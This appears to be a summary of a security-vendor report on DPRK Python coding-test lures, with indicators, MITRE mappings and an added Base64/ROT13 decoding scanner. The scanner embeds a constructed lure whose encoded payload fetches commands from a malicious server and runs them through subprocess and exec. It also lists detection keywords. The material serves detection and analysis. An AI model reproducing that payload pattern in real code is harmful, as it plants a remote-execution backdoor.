Code of Conduct: DPRK’s Python-Powered Breaches of Secure Networks — Elastic Security Labs

The article analyzes DPRK-affiliated threat groups using social engineering and Python-based lures to gain initial access to secure networks, highlighting obfuscated Python code that can execute commands and exfiltrate data. It emphasizes continuous vigilance and user education to defend against evolving threats. #DPRK #CovertCatch #KandyKorn #RookeryCapital_PythonTest.zip #Pyperclip

Keypoints

  • The DPRK employs advanced social engineering tactics involving long-term persona development.
  • Python is used for its ease of obfuscation, extensive libraries, and ability to blend malicious activity with legitimate system use.
  • Python-based lures can execute system commands and exfiltrate data while evading detection, because the interpreter, libraries and network calls they use are the same ones legitimate developer tooling uses.
  • Obfuscation techniques like Base64 and ROT13 are used to hide malicious functionality in seemingly innocent code.
  • Campaigns include samples like RookeryCapital_PythonTest.zip that masquerade as coding challenges to deliver malware.
  • Continuous education and user awareness are crucial to defend against these sophisticated attacks.

MITRE Techniques

  • [T1203] Exploitation for Client Execution – listed in the source as the technique behind remote command execution via malicious Python scripts; the behaviour actually described (a script running commands once the victim executes the "challenge") maps more precisely to T1059.006 below.
  • [T1027] Obfuscated Files or Information – malicious code and the C2 address are hidden behind Base64 and ROT13 encoding layers so that a casual read of the script, and naive string-based scanning, see nothing suspicious.
  • [T1071] Application Layer Protocol – the lure establishes communication with a remote server (https://akamaitechnologies.online, recovered from ROT13-encoded data) to fetch and execute further commands.
  • [T1059.006] Command and Scripting Interpreter: Python – the lure uses Python's subprocess module to execute arbitrary commands on the victim's machine.
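The Base64/ROT13 layering in the key points and in the T1027 and T1059.006 entries above is cheap to undo statically, which is how an analyst recovers the C2 URL without ever running the lure. The script below is an added example, not code from Elastic Security Labs or from the DPRK samples: it parses a Python file, peels every long string literal through ROT13 and strict Base64 (in any order, up to three layers), reports layers that decode to URLs or shell/exec calls, and lists the `exec`/`eval`/`subprocess` sinks the decoded blob usually feeds. The "password manager" sample it scans is constructed here to mirror the described pattern (a pyperclip import, an `exec()` of an encoded blob that contacts https://akamaitechnologies.online); it is not the contents of the real RookeryCapital_PythonTest.zip, and the decode-chain search and keyword list are this example's own assumptions.

```python
"""Static triage for Base64/ROT13 string obfuscation in Python lures.

Added example; not Elastic's or the DPRK samples' code. The decode chains,
keyword list and the sample script at the bottom are assumptions constructed
for illustration.
"""
import ast
import base64
import binascii
import codecs
import re

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+")
# Tokens whose appearance in a decoded layer make it worth reporting.
SUSPICIOUS = ("subprocess", "os.system", "exec(", "eval(", "http://", "https://")
# Call targets that hand control to decoded data or to the OS.
DYNAMIC_CALLS = {"exec", "eval", "system", "run", "Popen", "check_output"}


def _rot13(s: str) -> str:
    return codecs.decode(s, "rot_13")


def _b64(s: str):
    """Strict Base64 decode to text; None if the input is not Base64/UTF-8."""
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _interesting(text: str) -> bool:
    return any(tok in text.lower() for tok in SUSPICIOUS)


def peel(literal: str, max_depth: int = 3):
    """Breadth-first search over rot13/base64 decode chains of up to max_depth
    layers. Returns [(chain, decoded)] for every layer that contains a URL or
    a code-execution token. ROT13 is its own inverse, so it is never applied
    twice in a row; Base64 is attempted strictly so it fails fast on prose."""
    hits, frontier = [], [((), literal)]
    for _ in range(max_depth):
        nxt = []
        for chain, text in frontier:
            for name, fn in (("rot13", _rot13), ("base64", _b64)):
                if name == "rot13" and chain and chain[-1] == "rot13":
                    continue
                out = fn(text)
                if out is None or out == text:
                    continue
                new_chain = chain + (name,)
                if _interesting(out):
                    hits.append((">".join(new_chain), out))
                nxt.append((new_chain, out))
        frontier = nxt
    return hits


def scan_source(src: str, min_len: int = 16):
    """Parse Python source and peel every string literal of at least min_len
    characters. Each finding records the line, the decode chain, the decoded
    text and any URLs recovered from it."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) \
                and len(node.value) >= min_len:
            for chain, decoded in peel(node.value):
                findings.append({"line": node.lineno, "chain": chain,
                                 "decoded": decoded,
                                 "urls": URL_RE.findall(decoded)})
    return findings


def find_dynamic_exec(src: str):
    """Return (line, callee) for exec/eval and subprocess-style calls, the
    sinks a decoded blob is typically passed to."""
    out = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Call):
            f = node.func
            name = f.id if isinstance(f, ast.Name) else getattr(f, "attr", None)
            if name in DYNAMIC_CALLS:
                out.append((node.lineno, name))
    return sorted(out)


# --- Constructed sample lure (NOT the real RookeryCapital_PythonTest.zip) ---
# Payload is ROT13'd, then Base64'd, the reverse of how the lure unwraps it.
_PAYLOAD = ("import subprocess, requests\n"
            "r = requests.get('https://akamaitechnologies.online')\n"
            "subprocess.run(r.text, shell=True)\n")
_BLOB = base64.b64encode(codecs.encode(_PAYLOAD, "rot_13").encode()).decode()
SAMPLE_SOURCE = "\n".join([
    "import base64, codecs",
    "import pyperclip",
    "",
    "def save_password(pw):",
    "    pyperclip.copy(pw)",
    "",
    f'_cfg = "{_BLOB}"',
    'exec(codecs.decode(base64.b64decode(_cfg).decode(), "rot_13"))',
])

if __name__ == "__main__":
    for hit in scan_source(SAMPLE_SOURCE):
        print(f"line {hit['line']}: {hit['chain']} -> {hit['urls']}")
    print("dynamic execution sinks:", find_dynamic_exec(SAMPLE_SOURCE))
```

Run it as-is and it reports the blob on line 7 decoding via `base64>rot13` to code that contains https://akamaitechnologies.online, plus the `exec` sink on line 8. The same `scan_source` can be pointed at any `.py` file pulled from a "coding test" archive; raising `max_depth` covers lures that stack more layers, at the cost of a few more decode attempts per literal.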

Indicators of Compromise

  • [File] RookeryCapital_PythonTest.zip – the distributed "Python challenge" archive; contains PasswordManager.py and the obfuscated code.
  • [File] PasswordManager.py – the lure script inside the archive; imports the Pyperclip and Pyrebase modules.
  • [Software] Pyperclip – a legitimate PyPI clipboard library; only notable here because of the obfuscated context it is used in, not an indicator on its own.
  • [Software] Pyrebase – a legitimate Firebase client library imported alongside Pyperclip in the sample; same caveat.
  • [URL] https://akamaitechnologies.online – recovered by ROT13-decoding data in the sample; the malicious server the lure contacts. The name imitates Akamai's legitimate naming so that it blends into network logs.
  • [Domain] google.com – appears in the encoded payload as a reference string; a benign domain, so do not block or alert on it (the source does not state what the check is for).

Read more: https://www.elastic.co/security-labs/dprk-code-of-conduct